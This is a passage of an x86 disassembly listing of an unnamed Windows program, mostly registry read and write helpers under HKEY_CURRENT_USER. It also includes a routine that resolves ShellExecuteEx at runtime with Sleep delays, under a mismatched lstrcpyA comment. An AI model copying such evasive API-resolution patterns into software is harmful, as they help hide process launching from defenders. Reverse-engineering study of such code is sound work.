push dword ptr [ebp-24h]
call sub_411506
lea ecx, [ebp-54h]
call sub_406BA8
loc_4061A1: ; CODE XREF: sub_405E1F+366�j
lea ecx, [ebp-54h]
mov byte ptr [ebp-4], 0Bh
call sub_4068AF
lea ecx, [ebp-1Ch]
mov byte ptr [ebp-4], 0Ah
call sub_411512
lea ecx, [ebp-74h]
mov byte ptr [ebp-4], 3
call sub_4068AF
lea ecx, [ebp-34h]
mov byte ptr [ebp-4], 2
call sub_411512
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 1
call sub_411512
and byte ptr [ebp-4], 0
lea ecx, [ebp-14h]
call sub_411512
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call sub_411512
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov al, 1
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_405E1F endp
; =============== S U B R O U T I N E =======================================
sub_406208 proc near ; CODE XREF: sub_402C48+264�p
mov eax, offset loc_4121DC
call sub_41163A ; _EH_prolog
sub esp, 0Ch
push ebx
push esi
push edi
mov ebx, ecx
mov [ebp-10h], esp
push offset aShell32_dll ; "shell32.dll"
call dword_4130DC ; LoadLibraryA
test eax, eax
mov [ebp-14h], eax
jz short loc_40627A
push offset aShellexecuteex ; "ShellExecuteEx"
push eax
call dword_413060 ; GetProcAddress
mov edi, eax
test edi, edi
jz short loc_406271
mov esi, dword_4130E0
push 22h
call esi ; Sleep
push ecx
mov ecx, esp
mov [ebp-18h], esp
push offset aSei ; "sei \n"
call sub_4114FA
mov ecx, ebx
call sub_404B34
push 26h
call esi ; Sleep
and dword ptr [ebp-4], 0
mov eax, eax
push dword ptr [ebp+8]
call edi ; lstrcpyA
loc_406271: ; CODE XREF: sub_406208+37�j
; DATA XREF: sub_40628D�o
push dword ptr [ebp-14h]
call dword_413054 ; FreeLibrary
loc_40627A: ; CODE XREF: sub_406208+25�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov al, 1
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_406208 endp
; =============== S U B R O U T I N E =======================================
sub_40628D proc near ; DATA XREF: HSho:004156CC�o
mov eax, offset loc_406271
retn
sub_40628D endp
; =============== S U B R O U T I N E =======================================
sub_406293 proc near ; CODE XREF: sub_403488+69�p
; sub_403488+BD4�p ...
mov eax, [ecx]
test eax, eax
jz short locret_40629F
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
locret_40629F: ; CODE XREF: sub_406293+4�j
retn
sub_406293 endp
; =============== S U B R O U T I N E =======================================
sub_4062A0 proc near ; CODE XREF: sub_403488+61�p
; sub_403488+BC9�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, ecx
push edi
mov edi, [esi]
cmp edi, eax
jz short loc_4062C4
test eax, eax
mov [esi], eax
jz short loc_4062BA
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_4062BA: ; CODE XREF: sub_4062A0+12�j
test edi, edi
jz short loc_4062C4
mov eax, [edi]
push edi
call dword ptr [eax+8]
loc_4062C4: ; CODE XREF: sub_4062A0+C�j
; sub_4062A0+1C�j
mov eax, esi
pop edi
pop esi
retn 4
sub_4062A0 endp
; =============== S U B R O U T I N E =======================================
sub_4062CB proc near ; CODE XREF: sub_403488+77�p
; sub_403488+47A�p ...
arg_0 = dword ptr 4
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_4062DF
push 80004003h
call sub_411822
loc_4062DF: ; CODE XREF: sub_4062CB+8�j
xor eax, eax
cmp [esi], eax
pop esi
setz al
retn 4
sub_4062CB endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_4121F9
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp-10h], ecx
mov ecx, [ebp-10h]
call sub_407FC0
mov dword ptr [ebp-4], 0
mov eax, [ebp-10h]
mov dword ptr [eax+10h], 0
mov ecx, [ebp-10h]
mov dword ptr [ecx+14h], 0
push offset dword_419C48
mov ecx, [ebp-10h]
add ecx, 8
call sub_41150C
mov edx, [ebp-10h]
mov dword ptr [edx], 80000001h
mov eax, [ebp-10h]
mov dword ptr [eax+18h], 0
mov ecx, [ebp-10h]
mov dword ptr [ecx+1Ch], 0
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-10h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406374 proc near ; CODE XREF: sub_403488+3B6�p
; sub_404B40+174�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_406374
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push esi
mov [ebp+var_18], ecx
mov [ebp+var_4], 0
mov ecx, [ebp+var_18]
call sub_407FC0
mov byte ptr [ebp+var_4], 1
mov eax, [ebp+var_18]
mov dword ptr [eax+10h], 0
mov ecx, [ebp+var_18]
mov edx, [ebp+arg_4]
mov [ecx+14h], edx
mov eax, [ebp+var_18]
mov ecx, [ebp+arg_8]
mov [eax+1Ch], ecx
mov edx, [ebp+var_18]
mov eax, [ebp+arg_C]
mov [edx], eax
mov ecx, [ebp+var_18]
mov dword ptr [ecx+18h], 0
push offset asc_4174C8 ; "\\"
lea ecx, [ebp+arg_0]
call sub_411566
push 5Ch
lea ecx, [ebp+arg_0]
call sub_411536
push eax
lea edx, [ebp+var_10]
push edx
lea ecx, [ebp+arg_0]
call sub_411530
mov [ebp+var_1C], eax
mov eax, [ebp+var_1C]
mov [ebp+var_20], eax
mov byte ptr [ebp+var_4], 2
mov ecx, [ebp+var_20]
push ecx
mov ecx, [ebp+var_18]
add ecx, 0Ch
call sub_411518
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_10]
call sub_411512
push offset asc_4174CC ; "\\"
mov ecx, [ebp+var_18]
add ecx, 0Ch
call sub_411560
lea ecx, [ebp+arg_0]
call sub_408070
mov esi, eax
push 5Ch
lea ecx, [ebp+arg_0]
call sub_411536
sub esi, eax
push esi
lea edx, [ebp+var_14]
push edx
lea ecx, [ebp+arg_0]
call sub_41155A
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_28], eax
mov byte ptr [ebp+var_4], 3
mov ecx, [ebp+var_28]
push ecx
mov ecx, [ebp+var_18]
add ecx, 8
call sub_411518
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_14]
call sub_411512
push offset asc_4174D0 ; "\\"
mov ecx, [ebp+var_18]
add ecx, 8
call sub_411566
push offset asc_4174D4 ; "\\"
mov ecx, [ebp+var_18]
add ecx, 8
call sub_411560
mov ecx, [ebp+var_18]
call sub_4064D9
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+arg_0]
call sub_411512
mov eax, [ebp+var_18]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop esi
mov esp, ebp
pop ebp
retn 10h
sub_406374 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4064C6 proc near ; CODE XREF: sub_403488+3D7�p
; sub_404B40+4D8�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_408020
mov esp, ebp
pop ebp
retn
sub_4064C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4064D9 proc near ; CODE XREF: sub_406374+12A�p
; sub_406606+24�p
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
add eax, 4
push eax
push 20019h
push 0
mov ecx, [ebp+var_C]
add ecx, 0Ch
call sub_4026A0
push eax
mov ecx, [ebp+var_C]
mov edx, [ecx]
push edx
call dword_413004 ; RegOpenKeyExA
test eax, eax
jnz short loc_406575
mov [ebp+var_4], 4
lea eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_C]
add ecx, 10h
push ecx
lea edx, [ebp+var_8]
push edx
push 0
mov ecx, [ebp+var_C]
add ecx, 8
call sub_4026A0
push eax
mov eax, [ebp+var_C]
mov ecx, [eax+4]
push ecx
call dword_413010 ; RegQueryValueExA
test eax, eax
jnz short loc_406560
mov edx, [ebp+var_C]
mov dword ptr [edx+18h], 1
mov eax, [ebp+var_C]
mov ecx, [eax+4]
push ecx
call dword_413000 ; RegCloseKey
mov edx, [ebp+var_C]
mov eax, [edx+10h]
jmp short loc_40657B
; ---------------------------------------------------------------------------
loc_406560: ; CODE XREF: sub_4064D9+66�j
mov eax, [ebp+var_C]
mov ecx, [eax+4]
push ecx
call dword_413000 ; RegCloseKey
mov edx, [ebp+var_C]
mov eax, [edx+14h]
jmp short loc_40657B
; ---------------------------------------------------------------------------
loc_406575: ; CODE XREF: sub_4064D9+31�j
mov eax, [ebp+var_C]
mov eax, [eax+14h]
loc_40657B: ; CODE XREF: sub_4064D9+85�j
; sub_4064D9+9A�j
mov esp, ebp
pop ebp
retn
sub_4064D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40657F proc near ; CODE XREF: sub_406633+2C�p
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
lea eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_8]
add ecx, 4
push ecx
push 0
push 20006h
push 0
push offset dword_419C4C
push 0
mov ecx, [ebp+var_8]
add ecx, 0Ch
call sub_4026A0
push eax
mov edx, [ebp+var_8]
mov eax, [edx]
push eax
call dword_41300C ; RegCreateKeyExA
test eax, eax
jz short loc_4065C1
jmp short loc_406602
; ---------------------------------------------------------------------------
loc_4065C1: ; CODE XREF: sub_40657F+3E�j
push 4
mov ecx, [ebp+var_8]
add ecx, 10h
push ecx
push 4
push 0
mov ecx, [ebp+var_8]
add ecx, 8
call sub_4026A0
push eax
mov edx, [ebp+var_8]
mov eax, [edx+4]
push eax
call dword_413008 ; RegSetValueExA
test eax, eax
jnz short loc_4065F5
mov ecx, [ebp+var_8]
mov dword ptr [ecx+18h], 1
loc_4065F5: ; CODE XREF: sub_40657F+6A�j
mov edx, [ebp+var_8]
mov eax, [edx+4]
push eax
call dword_413000 ; RegCloseKey
loc_406602: ; CODE XREF: sub_40657F+40�j
mov esp, ebp
pop ebp
retn
sub_40657F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406606 proc near ; CODE XREF: sub_404B40+183�p
; sub_40543F+98�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax+18h], 0
jz short loc_406627
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+1Ch], 0
jnz short loc_406627
mov edx, [ebp+var_4]
mov eax, [edx+10h]
jmp short loc_40662F
; ---------------------------------------------------------------------------
loc_406627: ; CODE XREF: sub_406606+E�j
; sub_406606+17�j
mov ecx, [ebp+var_4]
call sub_4064D9
loc_40662F: ; CODE XREF: sub_406606+1F�j
mov esp, ebp
pop ebp
retn
sub_406606 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406633 proc near ; CODE XREF: sub_403488+3C8�p
; sub_40543F+D5�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
cmp ecx, [eax+10h]
jnz short loc_406653
mov edx, [ebp+var_4]
cmp dword ptr [edx+1Ch], 0
jnz short loc_406653
mov eax, [ebp+var_4]
jmp short loc_406667
; ---------------------------------------------------------------------------
loc_406653: ; CODE XREF: sub_406633+10�j
; sub_406633+19�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax+10h], ecx
mov ecx, [ebp+var_4]
call sub_40657F
mov eax, [ebp+var_4]
loc_406667: ; CODE XREF: sub_406633+1E�j
mov esp, ebp
pop ebp
retn 4
sub_406633 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_412252
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp-10h], ecx
mov ecx, [ebp-10h]
call sub_407FC0
mov dword ptr [ebp-4], 0
mov ecx, [ebp-10h]
add ecx, 10h
call sub_41151E
mov byte ptr [ebp-4], 1
mov ecx, [ebp-10h]
add ecx, 14h
call sub_41151E
mov byte ptr [ebp-4], 2
push offset dword_419C50
mov ecx, [ebp-10h]
add ecx, 10h
call sub_41150C
push offset dword_419C54
mov ecx, [ebp-10h]
add ecx, 14h
call sub_41150C
push offset dword_419C58
mov ecx, [ebp-10h]
add ecx, 8
call sub_41150C
mov eax, [ebp-10h]
mov dword ptr [eax], 80000001h
mov ecx, [ebp-10h]
mov dword ptr [ecx+18h], 0
mov edx, [ebp-10h]
mov dword ptr [edx+1Ch], 0
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-10h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40671B proc near ; CODE XREF: sub_403488+175�p
; sub_403488+296�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_40671B
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 20h
push esi
mov [ebp+var_1C], ecx
mov [ebp+var_4], 1
mov ecx, [ebp+var_1C]
call sub_407FC0
mov byte ptr [ebp+var_4], 2
mov ecx, [ebp+var_1C]
add ecx, 10h
call sub_41151E
mov byte ptr [ebp+var_4], 3
mov ecx, [ebp+var_1C]
add ecx, 14h
call sub_41151E
mov byte ptr [ebp+var_4], 4
push offset dword_419C5C
mov ecx, [ebp+var_1C]
add ecx, 10h
call sub_41150C
lea eax, [ebp+arg_4]
push eax
mov ecx, [ebp+var_1C]
add ecx, 14h
call sub_411518
mov ecx, [ebp+var_1C]
mov edx, [ebp+arg_8]
mov [ecx+1Ch], edx
mov eax, [ebp+var_1C]
mov ecx, [ebp+arg_C]
mov [eax], ecx
mov edx, [ebp+var_1C]
mov dword ptr [edx+18h], 0
push offset asc_4174D8 ; "\\"
lea ecx, [ebp+arg_0]
call sub_411566
push 5Ch
lea ecx, [ebp+arg_0]
call sub_411536
push eax
lea eax, [ebp+var_10]
push eax
lea ecx, [ebp+arg_0]
call sub_411530
mov [ebp+var_20], eax
mov ecx, [ebp+var_20]
mov [ebp+var_24], ecx
mov byte ptr [ebp+var_4], 5
mov edx, [ebp+var_24]
push edx
mov ecx, [ebp+var_1C]
add ecx, 0Ch
call sub_411518
mov byte ptr [ebp+var_4], 4
lea ecx, [ebp+var_10]
call sub_411512
push offset asc_4174DC ; "\\"
mov ecx, [ebp+var_1C]
add ecx, 0Ch
call sub_411560
lea ecx, [ebp+arg_0]
call sub_408070
mov esi, eax
push 5Ch
lea ecx, [ebp+arg_0]
call sub_411536
sub esi, eax
push esi
lea eax, [ebp+var_14]
push eax
lea ecx, [ebp+arg_0]
call sub_41155A
mov [ebp+var_28], eax
mov ecx, [ebp+var_28]
mov [ebp+var_2C], ecx
mov byte ptr [ebp+var_4], 6
mov edx, [ebp+var_2C]
push edx
mov ecx, [ebp+var_1C]
add ecx, 8
call sub_411518
mov byte ptr [ebp+var_4], 4
lea ecx, [ebp+var_14]
call sub_411512
push offset asc_4174E0 ; "\\"
mov ecx, [ebp+var_1C]
add ecx, 8
call sub_411566
push offset asc_4174E4 ; "\\"
mov ecx, [ebp+var_1C]
add ecx, 8
call sub_411560
lea eax, [ebp+var_18]
push eax
mov ecx, [ebp+var_1C]
call sub_406909
lea ecx, [ebp+var_18]
call sub_411512
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+arg_0]
call sub_411512
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+arg_4]
call sub_411512
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop esi
mov esp, ebp
pop ebp
retn 10h
sub_40671B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4068AF proc near ; CODE XREF: sub_403488+1A5�p
; sub_403488+2C6�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_4068AF
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp+var_10], ecx
mov [ebp+var_4], 1
mov ecx, [ebp+var_10]
add ecx, 14h
call sub_411512
mov byte ptr [ebp+var_4], 0
mov ecx, [ebp+var_10]
add ecx, 10h
call sub_411512
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, [ebp+var_10]
call sub_408020
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_4068AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406909 proc near ; CODE XREF: sub_40671B+158�p
; sub_406B4C+45�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_406909
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 2Ch
mov [ebp+var_30], ecx
mov [ebp+var_2C], 0
mov eax, [ebp+var_30]
add eax, 4
push eax
push 20019h
push 0
mov ecx, [ebp+var_30]
add ecx, 0Ch
call sub_4026A0
push eax
mov ecx, [ebp+var_30]
mov edx, [ecx]
push edx
call dword_413004 ; RegOpenKeyExA
test eax, eax
jnz loc_406A88
mov [ebp+var_10], 0
lea eax, [ebp+var_10]
push eax
push 0
lea ecx, [ebp+var_18]
push ecx
push 0
mov ecx, [ebp+var_30]
add ecx, 8
call sub_4026A0
push eax
mov edx, [ebp+var_30]
mov eax, [edx+4]
push eax
call dword_413010 ; RegQueryValueExA
mov ecx, [ebp+var_10]
push ecx
call sub_4114F4
add esp, 4
mov [ebp+var_1C], eax
mov edx, [ebp+var_1C]
mov [ebp+var_14], edx
lea eax, [ebp+var_10]
push eax
mov ecx, [ebp+var_14]
push ecx
lea edx, [ebp+var_18]
push edx
push 0
mov ecx, [ebp+var_30]
add ecx, 8
call sub_4026A0
push eax
mov eax, [ebp+var_30]
mov ecx, [eax+4]
push ecx
call dword_413010 ; RegQueryValueExA
test eax, eax
jnz loc_406A4C
mov edx, [ebp+var_14]
push edx
lea ecx, [ebp+var_20]
call sub_4114FA
mov [ebp+var_34], eax
mov eax, [ebp+var_34]
mov [ebp+var_38], eax
mov [ebp+var_4], 0
mov ecx, [ebp+var_38]
push ecx
mov ecx, [ebp+var_30]
add ecx, 10h
call sub_411518
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_20]
call sub_411512
mov edx, [ebp+var_14]
mov [ebp+var_24], edx
mov eax, [ebp+var_24]
push eax
call sub_4114EE
add esp, 4
mov ecx, [ebp+var_30]
mov dword ptr [ecx+18h], 1
mov edx, [ebp+var_30]
mov eax, [edx+4]
push eax
call dword_413000 ; RegCloseKey
mov ecx, [ebp+var_30]
add ecx, 10h
push ecx
mov ecx, [ebp+arg_0]
call sub_411506
mov edx, [ebp+var_2C]
or edx, 1
mov [ebp+var_2C], edx
mov eax, [ebp+arg_0]
jmp short loc_406AA3
; ---------------------------------------------------------------------------
loc_406A4C: ; CODE XREF: sub_406909+BD�j
mov eax, [ebp+var_14]
mov [ebp+var_28], eax
mov ecx, [ebp+var_28]
push ecx
call sub_4114EE
add esp, 4
mov edx, [ebp+var_30]
mov eax, [edx+4]
push eax
call dword_413000 ; RegCloseKey
mov ecx, [ebp+var_30]
add ecx, 14h
push ecx
mov ecx, [ebp+arg_0]
call sub_411506
mov edx, [ebp+var_2C]
or edx, 1
mov [ebp+var_2C], edx
mov eax, [ebp+arg_0]
jmp short loc_406AA3
; ---------------------------------------------------------------------------
loc_406A88: ; CODE XREF: sub_406909+4D�j
mov eax, [ebp+var_30]
add eax, 14h
push eax
mov ecx, [ebp+arg_0]
call sub_411506
mov ecx, [ebp+var_2C]
or ecx, 1
mov [ebp+var_2C], ecx
mov eax, [ebp+arg_0]
loc_406AA3: ; CODE XREF: sub_406909+141�j
; sub_406909+17D�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 4
sub_406909 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406AB3 proc near ; CODE XREF: sub_406BA8+73�p
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
lea eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_8]
add ecx, 4
push ecx
push 0
push 20006h
push 0
push offset dword_419C60
push 0
mov ecx, [ebp+var_8]
add ecx, 0Ch
call sub_4026A0
push eax
mov edx, [ebp+var_8]
mov eax, [edx]
push eax
call dword_41300C ; RegCreateKeyExA
test eax, eax
jz short loc_406AF5
jmp short loc_406B48
; ---------------------------------------------------------------------------
loc_406AF5: ; CODE XREF: sub_406AB3+3E�j
mov ecx, [ebp+var_8]
add ecx, 10h
call sub_408070
add eax, 1
push eax
mov ecx, [ebp+var_8]
add ecx, 10h
call sub_4026A0
push eax
push 1
push 0
mov ecx, [ebp+var_8]
add ecx, 8
call sub_4026A0
push eax
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
push edx
call dword_413008 ; RegSetValueExA
test eax, eax
jnz short loc_406B3B
mov eax, [ebp+var_8]
mov dword ptr [eax+18h], 1
loc_406B3B: ; CODE XREF: sub_406AB3+7C�j
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
push edx
call dword_413000 ; RegCloseKey
loc_406B48: ; CODE XREF: sub_406AB3+40�j
mov esp, ebp
pop ebp
retn
sub_406AB3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B4C proc near ; CODE XREF: sub_404B40+23D�p
; sub_404B40+37B�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov [ebp+var_4], 0
mov eax, [ebp+var_8]
cmp dword ptr [eax+18h], 0
jz short loc_406B8A
mov ecx, [ebp+var_8]
cmp dword ptr [ecx+1Ch], 0
jnz short loc_406B8A
mov edx, [ebp+var_8]
add edx, 10h
push edx
mov ecx, [ebp+arg_0]
call sub_411506
mov eax, [ebp+var_4]
or al, 1
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
jmp short loc_406BA2
; ---------------------------------------------------------------------------
loc_406B8A: ; CODE XREF: sub_406B4C+17�j
; sub_406B4C+20�j
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+var_8]
call sub_406909
mov edx, [ebp+var_4]
or edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+arg_0]
loc_406BA2: ; CODE XREF: sub_406B4C+3C�j
mov esp, ebp
pop ebp
retn 4
sub_406B4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406BA8 proc near ; CODE XREF: sub_403488+196�p
; sub_403488+2B7�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_406BA8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
mov [ebp+var_18], ecx
mov [ebp+var_4], 0
mov eax, [ebp+var_18]
add eax, 10h
push eax
lea ecx, [ebp+arg_0]
push ecx
call sub_4080B0
and eax, 0FFh
test eax, eax
jz short loc_406C09
mov edx, [ebp+var_18]
cmp dword ptr [edx+1Ch], 0
jnz short loc_406C09
mov eax, [ebp+var_18]
mov [ebp+var_10], eax
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+arg_0]
call sub_411512
mov eax, [ebp+var_10]
jmp short loc_406C38
; ---------------------------------------------------------------------------
loc_406C09: ; CODE XREF: sub_406BA8+3C�j
; sub_406BA8+45�j
lea ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+var_18]
add ecx, 10h
call sub_411518
mov ecx, [ebp+var_18]
call sub_406AB3
mov edx, [ebp+var_18]
mov [ebp+var_14], edx
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+arg_0]
call sub_411512
mov eax, [ebp+var_14]
loc_406C38: ; CODE XREF: sub_406BA8+5F�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 4
sub_406BA8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_4122F9
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 24h
mov [ebp-30h], ecx
mov ecx, [ebp-30h]
call sub_407FC0
mov dword ptr [ebp-4], 0
mov ecx, [ebp-30h]
add ecx, 10h
call sub_408170
mov ecx, [ebp-30h]
add ecx, 20h
call sub_408170
push 0
push 0
push 0
push 0
lea ecx, [ebp-1Ch]
call sub_408110
mov ecx, [ebp-30h]
add ecx, 10h
mov edx, [eax]
mov [ecx], edx
mov edx, [eax+4]
mov [ecx+4], edx
mov edx, [eax+8]
mov [ecx+8], edx
mov eax, [eax+0Ch]
mov [ecx+0Ch], eax
push 0
push 0
push 0
push 0
lea ecx, [ebp-2Ch]
call sub_408110
mov ecx, [ebp-30h]
add ecx, 20h
mov edx, [eax]
mov [ecx], edx
mov edx, [eax+4]
mov [ecx+4], edx
mov edx, [eax+8]
mov [ecx+8], edx
mov eax, [eax+0Ch]
mov [ecx+0Ch], eax
push offset dword_419C64
mov ecx, [ebp-30h]
add ecx, 8
call sub_41150C
mov ecx, [ebp-30h]
mov dword ptr [ecx], 80000001h
mov edx, [ebp-30h]
mov dword ptr [edx+30h], 0
mov eax, [ebp-30h]
mov dword ptr [eax+34h], 0
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-30h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_412327
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 3Ch
push esi
mov [ebp-38h], ecx
mov dword ptr [ebp-4], 0
mov ecx, [ebp-38h]
call sub_407FC0
mov byte ptr [ebp-4], 1
mov ecx, [ebp-38h]
add ecx, 10h
call sub_408170
mov ecx, [ebp-38h]
add ecx, 20h
call sub_408170
push 0
push 0
push 0
push 0
lea ecx, [ebp-1Ch]
call sub_408110
mov ecx, [ebp-38h]
add ecx, 10h
mov edx, [eax]
mov [ecx], edx
mov edx, [eax+4]
mov [ecx+4], edx
mov edx, [eax+8]
mov [ecx+8], edx
mov eax, [eax+0Ch]
mov [ecx+0Ch], eax
mov ecx, [ebp-38h]
add ecx, 20h
mov edx, [ebp+0Ch]
mov [ecx], edx
mov eax, [ebp+10h]
mov [ecx+4], eax
mov edx, [ebp+14h]
mov [ecx+8], edx
mov eax, [ebp+18h]
mov [ecx+0Ch], eax
mov ecx, [ebp-38h]
mov edx, [ebp+1Ch]
mov [ecx+34h], edx
mov eax, [ebp-38h]
mov ecx, [ebp+20h]
mov [eax], ecx
mov edx, [ebp-38h]
mov dword ptr [edx+30h], 0
push offset asc_4174E8 ; "\\"
lea ecx, [ebp+8]
call sub_411566
push 5Ch
lea ecx, [ebp+8]
call sub_411536
push eax
lea eax, [ebp-20h]
push eax
lea ecx, [ebp+8]
call sub_411530
mov [ebp-3Ch], eax
mov ecx, [ebp-3Ch]
mov [ebp-40h], ecx
mov byte ptr [ebp-4], 2
mov edx, [ebp-40h]
push edx
mov ecx, [ebp-38h]
add ecx, 0Ch
call sub_411518
mov byte ptr [ebp-4], 1
lea ecx, [ebp-20h]
call sub_411512
push offset asc_4174EC ; "\\"
mov ecx, [ebp-38h]
add ecx, 0Ch
call sub_411560
lea ecx, [ebp+8]
call sub_408070
mov esi, eax
push 5Ch
lea ecx, [ebp+8]
call sub_411536
sub esi, eax
push esi
lea eax, [ebp-24h]
push eax
lea ecx, [ebp+8]
call sub_41155A
mov [ebp-44h], eax
mov ecx, [ebp-44h]
mov [ebp-48h], ecx
mov byte ptr [ebp-4], 3
mov edx, [ebp-48h]
push edx
mov ecx, [ebp-38h]
add ecx, 8
call sub_411518
mov byte ptr [ebp-4], 1
lea ecx, [ebp-24h]
call sub_411512
push offset asc_4174F0 ; "\\"
mov ecx, [ebp-38h]
add ecx, 8
call sub_411566
